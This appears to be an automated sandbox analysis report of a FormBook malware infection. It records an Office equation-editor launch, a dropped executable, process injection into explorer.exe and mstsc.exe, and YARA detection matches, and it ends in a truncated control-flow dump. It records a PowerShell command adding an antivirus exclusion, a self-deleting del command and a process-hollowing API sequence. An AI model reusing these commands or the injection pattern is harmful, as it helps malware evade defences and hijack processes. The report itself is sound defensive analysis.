
                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:03:37:24
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                  Imagebase:0x13fcd0000
                                                                                                                                                                                  File size:1'423'704 bytes
                                                                                                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:03:37:25
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543'304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:03:37:29
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\ihbgfbin.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ihbgfbin.exe"
                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                  File size:662'016 bytes
                                                                                                                                                                                  MD5 hash:6A39668F48A502DBFA3CC13C7F463281
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:03:37:34
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
                                                                                                                                                                                  Imagebase:0xf60000
                                                                                                                                                                                  File size:427'008 bytes
                                                                                                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:03:37:34
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\ihbgfbin.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ihbgfbin.exe"
                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                  File size:662'016 bytes
                                                                                                                                                                                  MD5 hash:6A39668F48A502DBFA3CC13C7F463281
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:03:37:34
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                                                  File size:3'229'696 bytes
                                                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                  Start time:03:37:36
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                                  File size:1'068'544 bytes
                                                                                                                                                                                  MD5 hash:4676AAA9DDF52A50C829FEDB4EA81E54
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:03:37:39
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:/c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
                                                                                                                                                                                  Imagebase:0x4a170000
                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:03:37:49
                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543'304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:15.7%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:1.7%
                                                                                                                                                                                    Total number of Nodes:172
                                                                                                                                                                                    Total number of Limit Nodes:13
                                                                                                                                                                                    execution_graph 10725 1b49b8 10726 1b49c4 10725->10726 10729 1b7768 10726->10729 10727 1b49d5 10730 1b7794 10729->10730 10733 1b86b0 10730->10733 10731 1b783e 10731->10727 10734 1b86c2 10733->10734 10737 1b86e2 10734->10737 10735 1b86d6 10735->10731 10738 1b870a 10737->10738 10739 1b872d 10738->10739 10741 1b87c0 10738->10741 10739->10735 10742 1b87e4 10741->10742 10745 1b4924 10742->10745 10746 1b8920 NtQueryInformationProcess 10745->10746 10748 1b886b 10746->10748 10748->10739 10749 74333d 10751 743180 10749->10751 10750 7431c9 10751->10750 10754 7440f1 10751->10754 10773 74415e 10751->10773 10755 74411a 10754->10755 10793 7445f4 10755->10793 10800 7446a9 10755->10800 10805 744c29 10755->10805 10812 74476d 10755->10812 10819 744c0c 10755->10819 10824 744827 10755->10824 10828 744d87 10755->10828 10841 7448b9 10755->10841 10845 7449bf 10755->10845 10850 7444fd 10755->10850 10854 744dfd 10755->10854 10865 744593 10755->10865 10868 744e76 10755->10868 10873 744636 10755->10873 10880 744795 10755->10880 10885 7447f5 10755->10885 10756 74413e 10756->10751 10774 7440ec 10773->10774 10775 744161 10773->10775 10777 7445f4 4 API calls 10774->10777 10778 7447f5 2 API calls 10774->10778 10779 744795 2 API calls 10774->10779 10780 744636 4 API calls 10774->10780 10781 744e76 2 API calls 10774->10781 10782 744593 CreateProcessA 10774->10782 10783 744dfd 6 API calls 10774->10783 10784 7444fd CreateProcessA 10774->10784 10785 7449bf 2 API calls 10774->10785 10786 7448b9 2 API calls 10774->10786 10787 744d87 6 API calls 10774->10787 10788 744827 ReadProcessMemory 10774->10788 10789 744c0c 2 API calls 10774->10789 10790 74476d 4 API calls 10774->10790 10791 744c29 4 API calls 10774->10791 10792 7446a9 2 API calls 10774->10792 10775->10751 10776 74413e 10776->10751 10777->10776 10778->10776 10779->10776 10780->10776 10781->10776 10782->10776 10783->10776 10784->10776 10785->10776 10786->10776 10787->10776 10788->10776 10789->10776 10790->10776 10791->10776 10792->10776 10794 744600 10793->10794 10795 74496e 10794->10795 10891 742790 10794->10891 10895 742788 10794->10895 10899 7428b0 10794->10899 10903 7428b8 10794->10903 10795->10756 10801 7446b2 10800->10801 10803 7428b0 WriteProcessMemory 10801->10803 10804 7428b8 WriteProcessMemory 10801->10804 10802 744e9b 10803->10802 10804->10802 10806 74496e 10805->10806 10807 744600 10805->10807 10806->10756 10807->10806 10808 7428b0 WriteProcessMemory 10807->10808 10809 7428b8 WriteProcessMemory 10807->10809 10810 742790 VirtualAllocEx 10807->10810 10811 742788 VirtualAllocEx 10807->10811 10808->10807 10809->10807 10810->10807 10811->10807 10814 744600 10812->10814 10813 74496e 10813->10756 10814->10813 10815 742790 VirtualAllocEx 10814->10815 10816 742788 VirtualAllocEx 10814->10816 10817 7428b0 WriteProcessMemory 10814->10817 10818 7428b8 WriteProcessMemory 10814->10818 10815->10814 10816->10814 10817->10814 10818->10814 10820 744c0d 10819->10820 10907 742131 10820->10907 10912 742138 10820->10912 10821 744f44 10821->10756 10825 744a10 10824->10825 10916 742a18 10825->10916 10830 7449af 10828->10830 10840 742228 Wow64SetThreadContext 10828->10840 10920 742220 10828->10920 10829 744f12 10829->10756 10830->10829 10831 744600 10830->10831 10835 742220 Wow64SetThreadContext 10830->10835 10924 742228 10830->10924 10832 74496e 10831->10832 10833 7428b0 WriteProcessMemory 10831->10833 10834 7428b8 WriteProcessMemory 10831->10834 10837 742790 VirtualAllocEx 10831->10837 10838 742788 VirtualAllocEx 10831->10838 10832->10756 10833->10831 10834->10831 10835->10830 10837->10831 10838->10831 10840->10830 10843 7428b0 WriteProcessMemory 10841->10843 10844 7428b8 WriteProcessMemory 10841->10844 10842 7448e7 10843->10842 10844->10842 10846 7449d6 10845->10846 10848 742131 ResumeThread 10846->10848 10849 742138 ResumeThread 10846->10849 10847 744f44 10847->10756 10848->10847 10849->10847 10851 74451f 10850->10851 10928 742c50 10851->10928 10856 7449af 10854->10856 10855 744f12 10855->10756 10856->10854 10856->10855 10857 744600 10856->10857 10859 742220 Wow64SetThreadContext 10856->10859 10860 742228 Wow64SetThreadContext 10856->10860 10858 74496e 10857->10858 10861 7428b0 WriteProcessMemory 10857->10861 10862 7428b8 WriteProcessMemory 10857->10862 10863 742790 VirtualAllocEx 10857->10863 10864 742788 VirtualAllocEx 10857->10864 10858->10756 10859->10856 10860->10856 10861->10857 10862->10857 10863->10857 10864->10857 10866 7445d5 10865->10866 10867 742c50 CreateProcessA 10865->10867 10866->10756 10867->10866 10869 744e77 10868->10869 10871 7428b0 WriteProcessMemory 10869->10871 10872 7428b8 WriteProcessMemory 10869->10872 10870 744e9b 10871->10870 10872->10870 10874 744600 10873->10874 10875 74496e 10874->10875 10876 7428b0 WriteProcessMemory 10874->10876 10877 7428b8 WriteProcessMemory 10874->10877 10878 742790 VirtualAllocEx 10874->10878 10879 742788 VirtualAllocEx 10874->10879 10875->10756 10876->10874 10877->10874 10878->10874 10879->10874 10881 7447a3 10880->10881 10883 742131 ResumeThread 10881->10883 10884 742138 ResumeThread 10881->10884 10882 744f44 10882->10756 10883->10882 10884->10882 10886 7449d6 10885->10886 10887 744ba6 10886->10887 10889 742131 ResumeThread 10886->10889 10890 742138 ResumeThread 10886->10890 10887->10756 10888 744f44 10888->10756 10889->10888 10890->10888 10892 7427d4 VirtualAllocEx 10891->10892 10894 742852 10892->10894 10894->10794 10896 7427d4 VirtualAllocEx 10895->10896 10898 742852 10896->10898 10898->10794 10900 742904 WriteProcessMemory 10899->10900 10902 7429a3 10900->10902 10902->10794 10904 742904 WriteProcessMemory 10903->10904 10906 7429a3 10904->10906 10906->10794 10908 7420c5 10907->10908 10909 742136 ResumeThread 10907->10909 10908->10821 10911 7421ce 10909->10911 10911->10821 10913 74217c ResumeThread 10912->10913 10915 7421ce 10913->10915 10915->10821 10917 742a64 ReadProcessMemory 10916->10917 10919 742ae2 10917->10919 10919->10756 10921 742271 Wow64SetThreadContext 10920->10921 10923 7422ef 10921->10923 10923->10830 10925 742271 Wow64SetThreadContext 10924->10925 10927 7422ef 10925->10927 10927->10830 10929 742cd7 CreateProcessA 10928->10929 10931 742f35 10929->10931 10932 1b93b0 10934 1b93d4 10932->10934 10937 1b9882 10934->10937 10942 1b8fac 10934->10942 10946 1b8fb8 10934->10946 10938 1b984f 10937->10938 10939 1b9886 OutputDebugStringW 10937->10939 10938->10934 10941 1b993a 10939->10941 10941->10934 10943 1b9888 OutputDebugStringW 10942->10943 10945 1b993a 10943->10945 10945->10934 10947 1b9980 CloseHandle 10946->10947 10949 1b9a16 10947->10949 10949->10934

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 001B0514 Relevance: 7.6, Strings: 4, Instructions: 2627COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 1b0514-1b117b 3 1b117d 0->3 4 1b1182-1b15c2 call 1b07dc call 1b07ec call 1b07dc call 1b07ec call 1b07dc * 5 call 1b07ec * 4 call 1b07fc call 1b080c call 1b07dc call 1b081c call 1b0d40 0->4 3->4 83 1b170b-1b1724 4->83 84 1b172a-1b1c76 call 1b080c call 1b07fc * 2 call 1b0d60 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 83->84 85 1b15c7-1b15e5 83->85 170 1b1c78-1b1c84 84->170 171 1b1c92 84->171 86 1b15ec-1b1606 85->86 87 1b15e7 85->87 88 1b1608 86->88 89 1b160d-1b1623 86->89 87->86 88->89 91 1b162a-1b164d call 1b0d50 89->91 92 1b1625 89->92 98 1b164f 91->98 99 1b1654-1b1664 91->99 92->91 98->99 100 1b166b-1b16b2 99->100 101 1b1666 99->101 103 1b16bb-1b16c7 100->103 104 1b16b4 100->104 101->100 106 1b16c9 103->106 107 1b16ce-1b16df 103->107 104->103 106->107 109 1b16e1 107->109 110 1b16e6-1b16f9 107->110 109->110 111 1b16fb 110->111 112 1b1700-1b1708 110->112 111->112 112->83 173 1b1c8e 170->173 174 1b1c86-1b1c8c 170->174 172 1b1c98-1b1d50 call 1b01bc 171->172 183 1b1d6c 172->183 184 1b1d52-1b1d5e 172->184 175 1b1c90 173->175 174->175 175->172 185 1b1d72-1b1db1 183->185 186 1b1d68 184->186 187 1b1d60-1b1d66 184->187 191 1b1db8-1b1e4a 185->191 192 1b1db3 185->192 188 1b1d6a 186->188 187->188 188->185 199 1b1e4c-1b1e58 191->199 200 1b1e66 191->200 192->191 202 1b1e5a-1b1e60 199->202 203 1b1e62 199->203 201 1b1e6c-1b1f2f 200->201 212 1b1f3a-1b3c91 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dd0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dd0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0de0 call 1b0df0 call 1b0e00 call 1b0e10 call 1b0e20 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0e00 call 1b0e10 call 1b0e20 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0de0 call 1b0df0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0de0 call 1b0df0 call 1b0e30 call 1b0e40 call 1b0e50 call 1b0e60 * 19 201->212 204 1b1e64 202->204 203->204 204->201 553 1b3cbb 212->553 554 1b3c93-1b3c9f 212->554 555 1b3cc1-1b3dfd call 1b0e70 call 1b0e80 call 1b0e90 call 1b0d90 call 1b0ea0 call 1b0eb0 call 1b0ec0 call 1b0ed0 553->555 556 1b3ca9-1b3caf 554->556 557 1b3ca1-1b3ca7 554->557 558 1b3cb9 556->558 557->558 558->555
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Ppp$$p$$p$$p
                                                                                                                                                                                    • API String ID: 0-2834240603
                                                                                                                                                                                    • Opcode ID: 475b6339fab3fdd310cfe190f30e14a563d673850dfe8c254207a170045ea110
                                                                                                                                                                                    • Instruction ID: 12080ea2f6d1c0a1e87dc5a6e5a8e341df80339c47d0c68797bf08fdd4c1b2bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 475b6339fab3fdd310cfe190f30e14a563d673850dfe8c254207a170045ea110
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78531574A106198FDB25DF64C884BEAB7B2FF89300F5146E9E5096B361DB70AE81CF44
                                                                                                                                                                                    Function 001B1141 Relevance: 7.5, Strings: 4, Instructions: 2528COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 581 1b1141-1b117b 582 1b117d 581->582 583 1b1182-1b14af call 1b07dc call 1b07ec call 1b07dc call 1b07ec call 1b07dc * 5 call 1b07ec * 4 call 1b07fc 581->583 582->583 644 1b14b9-1b14c5 call 1b080c 583->644 646 1b14ca-1b1508 call 1b07dc 644->646 651 1b1513 646->651 652 1b151d-1b15c2 call 1b081c call 1b0d40 651->652 662 1b170b-1b1724 652->662 663 1b172a-1b1807 call 1b080c call 1b07fc * 2 call 1b0d60 662->663 664 1b15c7-1b15e5 662->664 700 1b1811-1b1825 call 1b0d70 663->700 665 1b15ec-1b1606 664->665 666 1b15e7 664->666 667 1b1608 665->667 668 1b160d-1b1623 665->668 666->665 667->668 670 1b162a-1b164d call 1b0d50 668->670 671 1b1625 668->671 677 1b164f 670->677 678 1b1654-1b1664 670->678 671->670 677->678 679 1b166b-1b16b2 678->679 680 1b1666 678->680 682 1b16bb-1b16c7 679->682 683 1b16b4 679->683 680->679 685 1b16c9 682->685 686 1b16ce-1b16df 682->686 683->682 685->686 688 1b16e1 686->688 689 1b16e6-1b16f9 686->689 688->689 690 1b16fb 689->690 691 1b1700-1b1708 689->691 690->691 691->662 702 1b182a-1b1c76 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 700->702 749 1b1c78-1b1c84 702->749 750 1b1c92 702->750 752 1b1c8e 749->752 753 1b1c86-1b1c8c 749->753 751 1b1c98-1b1cd6 750->751 756 1b1cdd-1b1cfb 751->756 754 1b1c90 752->754 753->754 754->751 757 1b1d06-1b1d50 call 1b01bc 756->757 762 1b1d6c 757->762 763 1b1d52-1b1d5e 757->763 764 1b1d72-1b1d90 762->764 765 1b1d68 763->765 766 1b1d60-1b1d66 763->766 768 1b1d97-1b1db1 764->768 767 1b1d6a 765->767 766->767 767->764 770 1b1db8-1b1e4a 768->770 771 1b1db3 768->771 778 1b1e4c-1b1e58 770->778 779 1b1e66 770->779 771->770 781 1b1e5a-1b1e60 778->781 782 1b1e62 778->782 780 1b1e6c-1b1f0a 779->780 790 1b1f15-1b1f2f 780->790 783 1b1e64 781->783 782->783 783->780 791 1b1f3a-1b3c91 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dd0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 